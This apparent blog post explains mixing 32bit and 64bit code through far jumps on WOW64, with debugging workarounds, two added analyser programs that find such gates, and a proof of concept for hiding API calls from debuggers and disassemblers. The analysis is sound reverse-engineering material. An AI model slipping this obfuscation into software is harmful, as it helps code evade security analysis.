<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>Windbg remote kernel debugger</u> - The only one that works. When doing remote kernel debugging you can step into the far jumps and the iretqs, so you can debug the code. Unfortunately there are some other limitations; for instance the assembler (that is, the "a" command) does not support 64bit instructions, so if you have to patch an executable for any reason you will have to patch the opcode bytes manually. Not the end of the world, but not nice either.</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;"><u>IDA</u> - You can try and use IDA's built-in debugger, but it won't directly load 64bit PE executables. It requires you to use the <i>dbgsrv</i> component from Windbg and then start a remote debugging session. I have not fully tested this feature, but since it uses <i>dbgsrv</i> it may work. Still, it requires remote debugging.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If you want to debug an executable that switches between 32bit and 64bit you need to use Windbg remote kernel debugging; I have not found another easy way to do it. Luckily, machines nowadays are powerful enough to run virtual machines, but it would still be much easier to be able to debug this sort of code locally.</span></div>
</div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">3.2 - A small workaround</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have said that Ollydbg (and basically every other usermode debugger) is not able to step through the far jumps, and that if you try you lose control of the execution, but there is still a way to get around the problem. If you know the 32bit address to which the 64bit code will return (via an iretq), you can put a bpx on it, let the program run, and the debugger will break there, skipping the 64bit code entirely. To explain it more clearly:</span></div>
</div>
<div>
<ul>
<li><span style="font-family: Verdana, sans-serif;">you arrive at a far jump that will switch to 64bit mode</span></li>
<li><span style="font-family: Verdana, sans-serif;">you know that the 64bit code will return to 32bit address xyz</span></li>
<li><span style="font-family: Verdana, sans-serif;">you set a bpx on address xyz</span></li>
<li><span style="font-family: Verdana, sans-serif;">you let the program run</span></li>
<li><span style="font-family: Verdana, sans-serif;">the debugger will break on xyz</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In this way you completely skip the 64bit snippet. But of course it requires you to have analysed that snippet beforehand, to determine which 32bit address it returns to, which slows everything down.</span></div>
</div>
</div>
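<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The program below is an added example and not code from the original post. It emits the two halves of the switch described in section 2.2 (the <i>jmp far ptr 33h:xxxx</i> on the 32bit side, and the 64bit stub that saves eax, pushes SS, RSP, RFLAGS, CS and RIP and executes <i>iretq</i>) byte for byte as in that listing, and then scans a code image for such gates to recover the 32bit address the iretq returns to: exactly the address the bpx workaround of section 3.2 needs, and the cross reference that IDA could not give us in section 2.3. The selectors 0x33, 0x23 and 0x2B and the flags value 0x246 are the ones in the listing; the sample image (base 0x401000, laid out like the section 2.2 program) is constructed inside the code; the function names are mine. The recovery is a byte-pattern walk, not a disassembler, so a stub that builds its iretq frame in some other way needs proper decoding.</span></div>

```c
/* Added example, not the original post's code: emit the 32bit->64bit far jmp and
 * the 64bit iretq stub of section 2.2 byte for byte, then scan a code image for
 * such gates and recover the 32bit address the iretq returns to (section 3.2). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SEL_CS64   0x33u   /* 64bit code selector shown by "dg 33"           */
#define SEL_CS32   0x23u   /* usermode 32bit code selector reloaded by iretq */
#define SEL_SS     0x2Bu   /* usermode stack selector, first value pushed    */
#define RFLAGS_DEF 0x246u  /* flags value hard-coded in the listing          */

static size_t put(uint8_t *b, size_t n, const void *src, size_t len) {
    memcpy(b + n, src, len);
    return n + len;
}

/* mov rax, imm64 ; push rax  ->  48 B8 <imm64 little-endian> 50 */
static size_t put_push_imm64(uint8_t *b, size_t n, uint64_t imm) {
    uint8_t op[11] = { 0x48, 0xB8 };
    for (int i = 0; i < 8; i++) op[2 + i] = (uint8_t)(imm >> (8 * i));
    op[10] = 0x50;
    return put(b, n, op, sizeof op);
}

/* 32bit side: jmp far ptr 33h:target  ->  EA <imm32> 33 00 (7 bytes). */
size_t emit_far_jmp64(uint8_t *b, uint32_t target) {
    uint8_t op[7] = { 0xEA, (uint8_t)target, (uint8_t)(target >> 8),
                      (uint8_t)(target >> 16), (uint8_t)(target >> 24),
                      (uint8_t)SEL_CS64, (uint8_t)(SEL_CS64 >> 8) };
    return put(b, 0, op, sizeof op);
}

/* 64bit side, the 63 bytes at 0x401019..0x401057 of section 2.2: stash eax below
 * rsp, push SS, RSP, RFLAGS, CS, RIP, iretq. Code at ret_eip must start with pop eax. */
size_t emit_return_stub(uint8_t *b, uint32_t ret_eip) {
    static const uint8_t head[] = {
        0x48, 0x83, 0xEC, 0x04,   /* sub rsp, 4               */
        0x89, 0x04, 0x24,         /* mov dword ptr [rsp], eax */
        0x48, 0x8B, 0xC4, 0x50,   /* mov rax, rsp ; push rax  */
        0x90, 0x90, 0x90, 0x90,   /* nop padding              */
        0x5B };                   /* pop rbx   (rbx = rsp)    */
    static const uint8_t push_rbx = 0x53, iretq[] = { 0x48, 0xCF };
    size_t n = put(b, 0, head, sizeof head);
    n = put_push_imm64(b, n, SEL_SS);        /* SS                       */
    n = put(b, n, &push_rbx, 1);             /* RSP (push rbx)           */
    n = put_push_imm64(b, n, RFLAGS_DEF);    /* RFLAGS                   */
    n = put_push_imm64(b, n, SEL_CS32);      /* CS                       */
    n = put_push_imm64(b, n, ret_eip);       /* RIP                      */
    return put(b, n, iretq, sizeof iretq);
}

struct gate { uint32_t jmp_va, target64, ret_eip; int ret_found; };

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Byte-pattern walk of a 64bit snippet (not a decoder): remember the last
 * "mov rax, imm64; push rax", stop at the first iretq (48 CF). Anything that
 * builds the frame in another way needs real disassembly. */
static int recover_ret_eip(const uint8_t *img, size_t len, size_t off, uint32_t *ret) {
    int have = 0; uint64_t last = 0;
    for (size_t j = off; j + 2 <= len && j < off + 256;) {
        if (img[j] == 0x48 && img[j + 1] == 0xCF) { if (have) *ret = (uint32_t)last; return have; }
        if (img[j] == 0x48 && img[j + 1] == 0xB8 && j + 11 <= len && img[j + 10] == 0x50) {
            last = 0;
            for (int k = 7; k >= 0; k--) last = last << 8 | img[j + 2 + k];
            have = 1; j += 11;
        } else j++;
    }
    return 0;
}

/* Find every "jmp far 33h:xxxx" in img (mapped at base) and recover its return EIP. */
int find_gates(const uint8_t *img, size_t len, uint32_t base, struct gate *out, int max) {
    int count = 0;
    for (size_t i = 0; i + 7 <= len && count < max; i++) {
        if (img[i] != 0xEA || img[i + 5] != (uint8_t)SEL_CS64 || img[i + 6] != 0) continue;
        struct gate g = { base + (uint32_t)i, le32(img + i + 1), 0, 0 };
        if (g.target64 >= base && g.target64 < base + len)
            g.ret_found = recover_ret_eip(img, len, g.target64 - base, &g.ret_eip);
        out[count++] = g;
    }
    return count;
}

/* Constructed sample: the .text layout of the section 2.2 program, base 0x401000. */
void build_sample_image(uint8_t *img, size_t len) {
    memset(img, 0x90, len);                  /* unknown bytes as nop padding       */
    emit_far_jmp64(img + 0x10, 0x401019);    /* .text:00401010 jmp far 33h:401019h */
    emit_return_stub(img + 0x19, 0x401080);  /* .text:00401019 .. 00401057         */
    img[0x80] = 0x58;                        /* .text:00401080 pop eax             */
}

int main(void) {
    uint8_t img[0x100]; struct gate g[8];
    build_sample_image(img, sizeof img);
    int n = find_gates(img, sizeof img, 0x401000, g, 8);
    for (int i = 0; i < n; i++)
        printf("far jmp at %08lx -> 64bit code at %08lx, iretq returns to %08lx%s\n",
               (unsigned long)g[i].jmp_va, (unsigned long)g[i].target64,
               (unsigned long)g[i].ret_eip, g[i].ret_found ? "" : " (not recovered)");
    return 0;
}
```

<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Any C99 compiler builds it; run as-is it reports the single gate of the sample image, with the far jump at 0x00401010, the 64bit code at 0x00401019 and the return address 0x00401080. On a real target, read the .text section of the 32bit PE into the buffer and pass its virtual address as base: every recovered return address is a place to set the bpx of section 3.2 before letting the 64bit code run, and the stub emitter gives you the raw bytes to patch in when the debugger's assembler cannot produce 64bit instructions.</span></div>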
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">4 - Some examples of obfuscation</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The state of the registers (and of the memory, the stack etc.) is preserved across switches, which means you can split any computation into parts executed in 32bit mode and parts executed in 64bit mode.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">For example, we can modify the test code in section 2.2 as follows (this time, for clarity, I'm writing the assembly code instead of the opcodes):</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 32bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401008 mov edx, 12345678h ; set edx before 64bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100D nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100E nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040100F nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401019h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 64bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401019 <span class="Apple-tab-span" style="white-space: pre;"> </span>sub rsp, 4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040101D <span class="Apple-tab-span" style="white-space: pre;"> </span>mov dword ptr [rsp], eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, rsp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401023<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401024<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401025<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401026<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401027<span class="Apple-tab-span" style="white-space: pre;"> </span>nop</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401028<span class="Apple-tab-span" style="white-space: pre;"> </span>pop<span class="Apple-tab-span" style="white-space: pre;"> </span>rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401029<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 2Bh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401033<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401034<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rbx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401035<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 246h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040103F<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401040<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 23h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104A<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:0040104B<span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, 401080h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401055<span class="Apple-tab-span" style="white-space: pre;"> </span>push<span class="Apple-tab-span" style="white-space: pre;"> </span>rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401056<span class="Apple-tab-span" style="white-space: pre;"> </span>add<span class="Apple-tab-span" style="white-space: pre;"> </span>rdx, rdx ; modifies edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401059<span class="Apple-tab-span" style="white-space: pre;"> </span>iretq ; returns to 32bit address 0x00401080</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------ 32bit code ------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401080<span class="Apple-tab-span" style="white-space: pre;"> </span>pop eax ; edx is now 0x12345678 + 0x12345678</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The code starts by setting a value (0x12345678) in the register EDX. Then it jumps to 64bit mode, where the 64bit instructions simply double the value of EDX. When the code returns to 32bit mode, EDX contains the value doubled by the 64bit snippet (0x2468ACF0). The same holds for the stack: you can push 32bit values from 64bit mode and they remain on the stack (assuming you don't change the stack pointer with the iretq). This means you can hide stack parameters for API calls. Moreover, you can hide the API call itself: all you need to do is jump to 64bit mode and call its corresponding 64bit version.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This may require some preparation (push the correct parameters, type conversions, etc.), but it's nothing too complicated:</span></div>
</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9LTHG9GD8nhMWnvgVqtb8lpDGEVagAPpTMbafWQNiSKZxdHgzCwg_rmZhF1SPwIpkMHX1g0ryXHckaqI0MrFJ7U10yl2lVHfEXbZMrF-30P5JFyLxSMpXg5xCOHuykeJvIybtRyUedQ/s1600/jmpred3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9LTHG9GD8nhMWnvgVqtb8lpDGEVagAPpTMbafWQNiSKZxdHgzCwg_rmZhF1SPwIpkMHX1g0ryXHckaqI0MrFJ7U10yl2lVHfEXbZMrF-30P5JFyLxSMpXg5xCOHuykeJvIybtRyUedQ/s1600/jmpred3.png" /></a></div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is an example of how you can call an API from 64bit, but of course you can do it in many other ways, or you can even invoke the SYSCALL yourself.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another interesting trick is to use a snippet of code that can be executed in both 32bit and 64bit mode and performs a different computation depending on the mode. For example, the sequence of bytes</span></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 48 03 D2</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">can be:</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - 64bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add rdx, rdx</span></div>
<div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> - 32bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> dec eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> add edx, edx</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">so you can run the same opcodes and have them behave differently. Or, even worse, you can add JMP instructions to the same opcodes from both 32bit and 64bit code, while only one of them is really executed at runtime, for example:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401010 jmp far ptr 33h:401050h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401020 jmp 401050h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401050 48 03 D2 ???</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">it becomes difficult to tell which of the two jumps is actually going to be executed at runtime. This is particularly annoying if you are trying to write a tool that automatically finds 64bit code snippets and disassembles them for you: if the tool blindly disassembles 0x00401050 as 64bit code, those bytes may in fact only ever be executed in 32bit mode, reached from 0x00401020, and so on.</span></div>
</div>
</div>
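<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (not code from the original post), here is a small Python analyser for the two problems described above, finding the 32bit return address on which to set a bpx, and automatically locating 64bit snippets: it scans for the <i>jmp far 33h:xxx</i> encoding, decodes the handful of 64bit instructions the listings above use while tracking what gets pushed, and reads RIP, CS, RFLAGS, RSP and SS off the iretq frame. The sample buffers are constructed from the post's two listings; their base addresses and the address of <i>Key</i> (0x403000) are assumptions.</span></div>

```python
# Added example, not code from the original post: a small static analyser for the
# 32bit -> 64bit -> 32bit snippets shown above. It finds the 'jmp far 33h:xxx'
# encoding, decodes the 64bit instruction subset the post's listings use while
# tracking a symbolic stack, and reads RIP/CS/RFLAGS/RSP/SS off the iretq frame.
FAR_JMP, PUSH_IMM32, PUSH_IMM8, NOP, REX_W = 0xEA, 0x68, 0x6A, 0x90, 0x48
SELECTOR_64 = b"\x33\x00"   # 64bit code selector used by the post's far jumps
MOD64 = 1 << 64

def find_far_jumps(code, base):
    """[(jmp_addr, target)] for every 'EA off32 33 00' pattern (byte scan, so data can false-positive)."""
    hits = []
    for off in range(len(code) - 6):
        if code[off] == FAR_JMP and code[off + 5:off + 7] == SELECTOR_64:
            hits.append((base + off, int.from_bytes(code[off + 1:off + 5], "little")))
    return hits

def imm(code, off, size):
    """Sign-extended 'size'-byte immediate at code[off], as an unsigned 64bit value."""
    return int.from_bytes(code[off:off + size], "little", signed=True) % MOD64

def step64(code, off, regs, stack):
    """Decode one instruction of the supported 64bit subset at code[off].
    regs = rax..rdi (None: not statically known); stack = pushed values, top last.
    Returns (next_off, reached_iretq); unknown opcodes raise instead of guessing."""
    b = code[off]
    if b == NOP:
        return off + 1, False
    if 0x50 <= b <= 0x57:                                   # push r64
        stack.append(regs[b - 0x50])
        return off + 1, False
    if 0x58 <= b <= 0x5F:                                   # pop r64
        regs[b - 0x58] = stack.pop() if stack else None
        return off + 1, False
    if b == PUSH_IMM32:                                     # push imm32 (sign-extended)
        stack.append(imm(code, off + 1, 4))
        return off + 5, False
    if b == PUSH_IMM8:                                      # push imm8 (sign-extended)
        stack.append(imm(code, off + 1, 1))
        return off + 2, False
    if b == 0x89 and code[off + 1:off + 3] == b"\x04\x24":  # mov dword ptr [rsp], eax
        return off + 3, False
    if b == 0x81 and code[off + 1] // 64 == 0 and code[off + 1] % 8 not in (4, 5):
        return off + 6, False                               # op dword ptr [reg], imm32
    if b != REX_W:
        raise ValueError("unsupported opcode 0x%02X at 0x%X" % (b, off))
    # 0x48 is a REX.W prefix here; decoded as 32bit code the same byte is 'dec eax'.
    op = code[off + 1]
    if op == 0xCF:                                          # iretq
        return off + 2, True
    if 0xB8 <= op <= 0xBF:                                  # mov r64, imm64
        regs[op - 0xB8] = int.from_bytes(code[off + 2:off + 10], "little")
        return off + 10, False
    if op == 0x83 and code[off + 2] == 0xEC:                # sub rsp, imm8
        return off + 4, False
    if op == 0x8B and code[off + 2] == 0xC4:                # mov rax, rsp
        regs[0] = None
        return off + 3, False
    if op == 0x03 and code[off + 2] // 64 == 3:             # add r64, r64
        regs[(code[off + 2] // 8) % 8] = None
        return off + 3, False
    raise ValueError("unsupported REX.W opcode 0x%02X at 0x%X" % (op, off))

def recover_iretq_frame(code, base, entry, max_insns=64):
    """Walk the 64bit snippet from 'entry' and return the iretq frame as a dict."""
    regs, stack, off = [None] * 8, [], entry - base
    for _ in range(max_insns):
        off, done = step64(code, off, regs, stack)
        if done and len(stack) >= 5:
            return dict(zip(("rip", "cs", "rflags", "rsp", "ss"), stack[::-1]))
        if done:
            raise ValueError("iretq reached with an incomplete frame")
    raise ValueError("no iretq within %d instructions" % max_insns)

def analyze(code, base):
    """For every far jump into 64bit mode, report the 32bit address it returns to."""
    report = []
    for jmp_addr, entry in find_far_jumps(code, base):
        if base <= entry < base + len(code):                # target must be in the buffer
            frame = recover_iretq_frame(code, base, entry)
            report.append({"far_jmp": jmp_addr, "entry64": entry, "return32": frame["rip"],
                           "cs": frame["cs"], "ss": frame["ss"], "rflags": frame["rflags"]})
    return report

# Constructed from the post's first listing (section 4); base address assumed.
SNIPPET_A_BASE = 0x401008
SNIPPET_A = bytes.fromhex(
    "BA78563412" "909090" "EA19104000" "3300" "9090"       # mov edx ; nops ; jmp far 33h:401019h ; "..."
    "4883EC04" "890424" "488BC4" "50" "90909090" "5B"      # sub rsp,4 ; mov [rsp],eax ; ... ; pop rbx
    "48B8" "2B00000000000000" "50" "53" "48B8" "4602000000000000" "50"  # push SS, RSP, RFLAGS
    "48B8" "2300000000000000" "50" "48B8" "8010400000000000" "50"       # push CS, RIP (401080h)
    "4803D2" "48CF")                                       # add rdx,rdx ; iretq
# Constructed from the test.asm listing (section 5.1); base and Key address (0x403000) assumed.
SNIPPET_B_BASE = 0x401000
SNIPPET_B = bytes.fromhex(
    "EA07104000" "3300" "51" "48B9" "0030400000000000" "810178563412" "59"  # jmp far ; update Key
    "4883EC04" "890424" "488BC4" "6A2B" "50" "6846020000" "6A23"           # frame setup
    "6834104000" "48CF" "58C3")                            # push LocExit ; iretq ; pop eax ; ret
```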
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">5 - Tools</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Compilers are not designed to handle this situation either, so developing this trick is not straightforward. Compilers, like debuggers and disassemblers, are designed to handle ONE architecture at a time. Mixing 32bit and 64bit is not easy, but it is not too difficult to write tools or plugins that generate 64bit snippets to be embedded inside a 32bit executable. You can for example use the "<i>__emit</i>" compiler intrinsic available in old Visual Studio versions, or you can use NASM or other assemblers to generate both 32bit and 64bit code and then merge them into one single executable.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are my proposals to help you implement this kind of obfuscation.</span></div>
</div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif;">5.1 - How to include the obfuscation in a Visual Studio project</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To show you how to implement the obfuscation in your own Visual Studio project, I have crafted a POC that you can easily modify.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I have first created a 32bit Visual Studio project called "<i>Asm_C</i>" containing two files: "<i>main.cpp</i>" and "<i>test.asm</i>". "<i>main.cpp</i>" simply executes "<i>run_asm64()</i>", the assembly routine that is located in "<i>test.asm</i>", and demonstrates how this routine modifies the value of the "Key" variable.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In particular, this routine consists of:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">opcodes to jump in 64bit mode;</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">the 64bit opcodes corresponding to the assembly code you want to execute (in this case, the ones that modify the "Key" variable);</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">opcodes to return in 32bit mode.</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is done to work around the lack of support for the two architectures together: you can't mix 32bit code and 64bit code in the same project, but you can use the corresponding opcodes instead!</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that I have also written the far jump that enters 64bit mode as raw opcodes, even though it runs in 32bit mode, because MASM does not seem to support far jumps properly.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are the listings:</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">main.cpp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <windows.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">#include <stdio.h></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" void run_asm64(void);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">extern "C" int Key = 0x10000000;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">using namespace std;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">int main(void)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("Key before 64bit: %08x \n", Key);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>run_asm64();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>printf("Key after 64bit: %08x \n", Key);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">test.asm</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.586</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.MODEL FLAT, C</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.STACK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.DATA</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Extern Key:DWORD</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.CODE ;Indicates the start of a code segment.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">run_asm64 PROC</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 0EAh<span class="Apple-tab-span" style="white-space: pre;"> </span>; jump to enter 64 bit</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>dd offset LocEnter</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>db 033h, 000h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">LocEnter:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>; Add the 64bit opcodes within the two lines</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>; warning: remember to preserve the registers you trash</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>;-----------------------------------------------------</span></div>
<div>
